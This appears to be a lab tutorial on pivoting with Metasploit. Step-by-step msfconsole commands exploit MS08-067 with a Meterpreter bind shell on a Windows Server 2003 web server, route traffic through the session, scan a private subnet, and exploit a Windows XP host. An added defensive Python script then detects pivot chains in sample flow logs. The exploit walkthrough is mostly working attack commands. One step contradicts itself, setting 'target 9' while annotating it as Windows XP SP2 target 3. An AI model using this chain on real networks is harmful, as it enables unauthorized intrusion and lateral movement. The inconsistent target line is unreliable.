Pivoting is a powerful technique within the Metasploit Framework that allows a hacker to access a private subnet within a network. For example, an attacker would compromise a host (ex: web server) that is accessible (i.e., routable IP address) and use that host as a staging point to pivot and compromise other systems in subnets that would not have been accessible from outside the network. According to Metasploit, pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console.
For this setup, I will use the following VirtualBox virtual machines:
- Attacker machine (BackTrack 5)
  - 192.168.1.107
- Windows Server 2003
  - Web server
  - Accessible (public IP) – 192.168.1.105
  - Non-accessible (private IP) – 192.168.56.102
- Windows XP
  - Host machine
  - 192.168.56.103
In the following tutorial, I will use the BackTrack 5 machine to exploit the web server (Windows Server 2003) and set up a staging point on the server from which to pivot to the Windows XP host, which is only accessible to users inside the network.
First, I will map the network with Nmap to discover any accessible hosts:
- nmap -sS 192.168.1.1/24
Once I have discovered 192.168.1.105, I will scan it for open ports and the services running on them:
- nmap -sV -O 192.168.1.105
The scan informs me that port 80 (the web server port for public access) is running an Apache web server, and that ports 135 and 139 are open as well. I use the Windows netapi exploit, known as the “Server Service Vulnerability.”
- use windows/smb/ms08_067_netapi
- show payloads
- set PAYLOAD windows/meterpreter/bind_tcp
  - A bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect to maintain access to the machine.
- show options
  - View what settings are needed.
- set RHOST 192.168.1.105
- show targets
  - To specify our specific target.
- set target 9
  - Target 9 is Windows Server 2003 SP1.
- exploit
Once the host is exploited, a meterpreter session is created and our machine has direct access to and control over the machine. We confirm this by entering the ipconfig command to view the IP addresses. The command returns:
- 192.168.1.105 / 255.255.255.0
- 192.168.56.102 / 255.255.255.0
Since we do not have access to the 192.168.56.0 network, we will run an ARP scan to discover hosts that are up in that network:
- run arp_scanner -r 192.168.56.1/24
With the network and its hosts discovered, we will set up a route so that traffic for the private network is sent through our meterpreter session (identified by its session id). First, we have to background our meterpreter session.
- background
- route add 192.168.56.1 255.255.255.0 1
  - The command routes traffic for the subnet through our meterpreter session id, 1.
  - You can view the session id by entering the command sessions -l.
- route print
  - To view the route we just added.
We need to port scan the host discovered by the ARP scan to find a port through which we can set up communication. First, we need to go back and load the auxiliary module for TCP port scanning. The required setting is the remote host (RHOSTS).
- back
- use scanner/portscan/tcp
- show options
- set RHOSTS 192.168.56.103
- run
Ports 25, 80, 135, and 139 are open. We will use the RPC exploit on port 135 and subsequently have direct access to and control over the machine through a meterpreter session.
- back
- use windows/smb/ms08_067_netapi
- show options
- set RHOST 192.168.56.103
- set PAYLOAD windows/meterpreter/bind_tcp
- show options
- show targets
  - To specify our specific target.
- set target 9
  - Target 3 is Windows XP SP2.
- exploit
A meterpreter session should be created, and the attacker machine has full control of the compromised host in the private subnet. Type ipconfig to view the compromised host's IP configuration.
Background the meterpreter session by entering the command background. View your sessions by typing sessions. The output displays the steps you have taken to get from your machine to the host in the private subnet under the “Connection” column.
- 192.168.1.107:59377 -> 192.168.1.105:4444
  - From the attacker machine to the web server
- 192.168.1.107-192.168.1.105:0 -> 192.168.56.103:4444
  - From the web server to the XP host
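From the defender's side, the pivot chain shown in that Connection column is also visible in the network's own flow records: the dual-homed web server first receives a connection on the listener port, then originates a port sweep and a connection to the same port on the private host. The following Python script is an added example, not part of the original post; the flow records, the asset inventory that maps the web server's two addresses to one asset, and the thresholds are all constructed assumptions.

```python
from collections import defaultdict

# Constructed sample flow log (not from the post): src,sport,dst,dport
SAMPLE_FLOWS = """\
192.168.1.107,59377,192.168.1.105,4444
192.168.56.102,49152,192.168.56.103,22
192.168.56.102,49153,192.168.56.103,25
192.168.56.102,49154,192.168.56.103,80
192.168.56.102,49155,192.168.56.103,135
192.168.56.102,49156,192.168.56.103,139
192.168.56.102,49157,192.168.56.103,445
192.168.56.102,49158,192.168.56.103,4444
192.168.56.110,50000,192.168.56.103,80
"""

# Hypothetical asset inventory: the dual-homed web server from the post has a
# public and a private address, so both addresses resolve to one asset name.
ASSETS = {"192.168.1.105": "webserver", "192.168.56.102": "webserver",
          "192.168.1.107": "external-host", "192.168.56.103": "xp-host",
          "192.168.56.110": "fileserver"}

SHELL_PORTS = {4444}   # listener port used by the bind_tcp payload in the post
SCAN_THRESHOLD = 5     # distinct destination ports from one source to one host


def parse_flows(text):
    """Parse 'src,sport,dst,dport' lines into tuples."""
    rows = []
    for line in text.strip().splitlines():
        src, sport, dst, dport = line.split(",")
        rows.append((src, int(sport), dst, int(dport)))
    return rows


def find_pivot_chains(flows, assets=ASSETS):
    """Return (asset, reasons) for every asset that both received a
    suspicious inbound connection and originated suspicious outbound traffic,
    i.e. the pattern of a compromised host being used as a pivot."""
    inbound, outbound = defaultdict(set), defaultdict(set)
    ports_seen = defaultdict(set)          # (src asset, dst asset) -> dports
    for src, _sport, dst, dport in flows:
        s, d = assets.get(src, src), assets.get(dst, dst)
        ports_seen[(s, d)].add(dport)
        if dport in SHELL_PORTS:
            inbound[d].add(f"shell port {dport} from {s}")
            outbound[s].add(f"shell port {dport} to {d}")
    for (s, d), ports in ports_seen.items():
        if len(ports) >= SCAN_THRESHOLD:
            outbound[s].add(f"port sweep of {len(ports)} ports against {d}")
    return sorted((a, sorted(inbound[a] | outbound[a]))
                  for a in inbound if a in outbound)
```

On the sample data only the web server is flagged: the XP host only receives a shell connection and the external host only originates one, so neither matches the pivot pattern.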